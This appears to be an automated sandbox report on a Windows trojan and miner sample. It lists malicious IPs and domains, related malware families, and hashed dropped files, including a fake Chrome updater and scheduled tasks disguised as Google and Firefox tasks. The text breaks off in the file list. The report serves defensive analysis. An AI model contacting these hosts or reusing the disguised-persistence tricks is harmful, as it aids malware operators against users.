Start date and time:	2023-11-10 15:34:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	67
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.mine.winEXE@101/48@15/3
EGA Information:	Successful, ratio: 61.5%
HCA Information:	Successful, ratio: 58% Number of executed functions: 88 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 5776 because it is empty
Execution Graph export aborted for target latestX.exe, PID 4024 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4132 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4928 because it is empty
Execution Graph export aborted for target updater.exe, PID 6820 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
15:35:00	API Interceptor	1x Sleep call for process: latestX.exe modified
15:35:04	API Interceptor	8x Sleep call for process: e0cbefcb1af40c7d4aff4aca26621a98.exe modified
15:35:05	API Interceptor	143x Sleep call for process: powershell.exe modified
15:35:08	API Interceptor	189744x Sleep call for process: explorer.exe modified
15:35:15	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
15:35:31	API Interceptor	1x Sleep call for process: updater.exe modified
15:35:35	Task Scheduler	Run new task: Firefox Default Browser Agent DBC7BA9624D1C753 path: C:\Users\user\AppData\Roaming\cdttvvc
15:35:55	API Interceptor	7889x Sleep call for process: conhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51.15.58.224	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	setup.EXE.exe	Get hash	malicious	Xmrig	Browse
	YzCKg0nbmc.exe	Get hash	malicious	Xmrig	Browse
	ByB7zmKC1p.exe	Get hash	malicious	Xmrig	Browse
	c6hPBw9KeL.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
95.214.26.28	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	host-host-file8.com/
	weZmNLRymq.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	host-host-file8.com/
	0AUHCLH7qV.exe	Get hash	malicious	CryptOne, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.TrojanX-gen.10688.3868.exe	Get hash	malicious	CryptOne, SmokeLoader	Browse	host-file-file0.com/
	toolspub1.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	host-host-file8.com/
	SecuriteInfo.com.Win32.BackdoorX-gen.6398.392.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.Evo-gen.23799.31617.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.TrojanX-gen.8935.9906.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.PWSX-gen.5896.22999.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.PWSX-gen.16344.5425.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.PWSX-gen.32685.3981.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	SecuriteInfo.com.Win32.BotX-gen.6223.2684.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	OIARlFNfU8.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	host-host-file8.com/
	z9f5QHrbNk.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	host-file-file0.com/
	kOSyIfKBbS.exe	Get hash	malicious	SmokeLoader	Browse	file-file-file1.com/
	0hhnPif3wS.exe	Get hash	malicious	SmokeLoader	Browse	host-file-file0.com/
	xBObcOIIHu.exe	Get hash	malicious	SmokeLoader	Browse	host-host-file8.com/
	QLtHe8w7jh.exe	Get hash	malicious	SmokeLoader	Browse	host-host-file8.com/
	SecuriteInfo.com.Trojan.MulDropNET.43.6599.26850.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	host-host-file8.com/
	6eVKkQv3fM.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	host-host-file8.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
host-host-file8.com	62CqhWaRXv.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	5KAuN5LJp8.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	ZpYKkfX4OE.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	hngrEXSmFY.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	gvd1S6Rsnw.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	NZpBgYa3Xr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	0JrumGQwIr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	q7190nRWYq.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	NClZXnAXpR.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	576vSDlSuf.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	UOUUppuDer.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	8f9feab4c64cceed94d26521596cd9a58e0290a1907f6.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	FGFJ64uGR1.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	H6vdyhJY5W.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	hbw8Iew2qP.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	CK4bT0GrLU.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	I7yRLHBBnh.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	95.214.26.28
	lPbCFVP9qN.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	NTykbOZNgR.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	MTxj96wecj.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
xmr-eu1.nanopool.org	5KAuN5LJp8.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.15.58.224
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	163.172.154.142
	geNULfM844.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	51.15.65.182
	weZmNLRymq.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	51.15.65.182
	OIARlFNfU8.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	163.172.154.142
	file.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.15.58.224
	file.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	163.172.154.142
	0MYzxvJ9od.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	51.68.143.81
	Zh85IN8ZDs.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT	Browse	51.255.34.118
	6cbfQ0H7lo.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.15.193.130
	k1MD2whY2s.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	163.172.154.142
	file.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.15.58.224
	OnLNTrUVyu.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.68.190.80
	b7I7FmvQEU.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT	Browse	163.172.154.142
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Xmrig	Browse	212.47.253.124
	Yp0sfONtus.exe	Get hash	malicious	Amadey, Babadeda, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	51.15.193.130
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, Babadeda, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader	Browse	51.68.190.80
	ou2K6cueKP.exe	Get hash	malicious	ScreenConnect Tool, Amadey, Glupteba, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader	Browse	51.255.34.118
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse	51.68.143.81
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse	51.15.58.224

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	65DmhZE69q.exe	Get hash	malicious	Unknown	Browse	195.154.252.221
	zA2zEgyZdq.exe	Get hash	malicious	Unknown	Browse	195.154.188.211
	zA2zEgyZdq.exe	Get hash	malicious	Unknown	Browse	62.210.204.131
	5Wamr1ZxH5.exe	Get hash	malicious	Unknown	Browse	195.154.178.238
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	163.172.154.142
	https://dariuscooks.tv/peach-cobbler-cream-cheese-pound-cake/	Get hash	malicious	Unknown	Browse	51.15.145.115
	https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9a	Get hash	malicious	Unknown	Browse	51.159.84.191
	r67iDejfDO.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	51.159.66.125
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Vidar	Browse	51.159.66.125
	7dEXDRYnuP.exe	Get hash	malicious	Unknown	Browse	195.154.252.221
	Yr7pYbz4E7.exe	Get hash	malicious	PrivateLoader, RedLine, SmokeLoader, Vidar, onlyLogger	Browse	51.159.66.125
	file.exe	Get hash	malicious	Glupteba, RedLine, Vidar	Browse	51.159.66.125
	SecuriteInfo.com.Trojan.MulDropNET.43.6599.26850.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	195.154.176.206
	6eVKkQv3fM.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	195.154.251.21
	file.exe	Get hash	malicious	Amadey, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	195.154.251.99
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	195.154.251.99
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Vidar	Browse	51.159.66.125
	oZasOwbAre.elf	Get hash	malicious	Mirai	Browse	51.15.139.14
	http://51.15.252.36/	Get hash	malicious	HTMLPhisher	Browse	51.15.252.36
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Xmrig	Browse	195.154.174.130
CMCSUS	62CqhWaRXv.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	5KAuN5LJp8.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	ZpYKkfX4OE.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	hngrEXSmFY.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	gvd1S6Rsnw.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	NZpBgYa3Xr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	0JrumGQwIr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	q7190nRWYq.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	NClZXnAXpR.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	576vSDlSuf.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	UOUUppuDer.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	8f9feab4c64cceed94d26521596cd9a58e0290a1907f6.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	FGFJ64uGR1.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	H6vdyhJY5W.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	hbw8Iew2qP.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse	95.214.26.28
	CK4bT0GrLU.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	I7yRLHBBnh.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	95.214.26.28
	lPbCFVP9qN.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse	95.214.26.28
	8WrUglWiWb.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	95.214.26.28
	CKMt2eVUzC.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	95.214.26.28

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Google\Chrome\updater.exe	62CqhWaRXv.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	5KAuN5LJp8.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	ZpYKkfX4OE.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	hngrEXSmFY.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	gvd1S6Rsnw.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	NZpBgYa3Xr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	0JrumGQwIr.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	q7190nRWYq.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	NClZXnAXpR.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	576vSDlSuf.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	UOUUppuDer.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	8f9feab4c64cceed94d26521596cd9a58e0290a1907f6.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	FGFJ64uGR1.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	H6vdyhJY5W.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	hbw8Iew2qP.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Xmrig	Browse
	CK4bT0GrLU.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	lPbCFVP9qN.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	8WrUglWiWb.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	NTykbOZNgR.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	MTxj96wecj.exe	Get hash	malicious	Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\latestX.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5874968
Entropy (8bit):	7.70017826439962
Encrypted:	false
SSDEEP:	49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05
MD5:	BAE29E49E8190BFBBF0D77FFAB8DE59D
SHA1:	4A6352BB47C7E1666A60C76F9B17CA4707872BD9
SHA-256:	F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
SHA-512:	9E6CF6519E21143F9B570A878A5CA1BBA376256217C34AB676E8D632611D468F277A0D6F946AB8705121002D96A89274F38458AFFE3DF3A3A1C75E336D7D66E2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: 62CqhWaRXv.exe, Detection: malicious, Browse Filename: 5KAuN5LJp8.exe, Detection: malicious, Browse Filename: ZpYKkfX4OE.exe, Detection: malicious, Browse Filename: hngrEXSmFY.exe, Detection: malicious, Browse Filename: gvd1S6Rsnw.exe, Detection: malicious, Browse Filename: NZpBgYa3Xr.exe, Detection: malicious, Browse Filename: 0JrumGQwIr.exe, Detection: malicious, Browse Filename: q7190nRWYq.exe, Detection: malicious, Browse Filename: NClZXnAXpR.exe, Detection: malicious, Browse Filename: 576vSDlSuf.exe, Detection: malicious, Browse Filename: UOUUppuDer.exe, Detection: malicious, Browse Filename: 8f9feab4c64cceed94d26521596cd9a58e0290a1907f6.exe, Detection: malicious, Browse Filename: FGFJ64uGR1.exe, Detection: malicious, Browse Filename: H6vdyhJY5W.exe, Detection: malicious, Browse Filename: hbw8Iew2qP.exe, Detection: malicious, Browse Filename: CK4bT0GrLU.exe, Detection: malicious, Browse Filename: lPbCFVP9qN.exe, Detection: malicious, Browse Filename: 8WrUglWiWb.exe, Detection: malicious, Browse Filename: NTykbOZNgR.exe, Detection: malicious, Browse Filename: MTxj96wecj.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?.d...............&.....xY................@..............................Z.....@.Y...`... ...............................................Y.p.....Y......PY......\|Y..)....Z.0........................... <Y.(.....................Y.`............................text...............................`..`.data.....W.......W.................@....rdata...>....Y..@....X.............@..@.pdata.......PY......6Y.............@..@.xdata..L....pY......PY.............@..@.bss.....-....Y..........................idata..p.....Y......dY.............@....CRT....`.....Y......pY.............@....tls..........Y......rY.............@....rsrc.........Y......tY.............@....reloc..0.....Z......xY.............@..B........................................................................................................................................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2224
Entropy (8bit):	5.354902188542171
Encrypted:	false
SSDEEP:	48:CWSU4y4RQmFoUeWmfgZ9tK8NPdMs7u1iMuge//8aOUyu0lhV:CLHyIFKL3IZ2KlDOugg01
MD5:	80EA35E6235366285D62F286CDAE9652
SHA1:	D92475BA18044F955224B9F524F6848F76D1F89B
SHA-256:	5E0126B3E9570F2BA3024C6F332DE08DCE09F1BF0B516132E5E417CDE6BB459F
SHA-512:	9C478D0C78D2B84F6AE98B7D01DF861D00D1A8CC135CC39ABE0219FACA9D44D0B71B756BB91C56FAB99DF1DA0095F2BB084BF31F152CA64DFC7B328CA18F315D
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
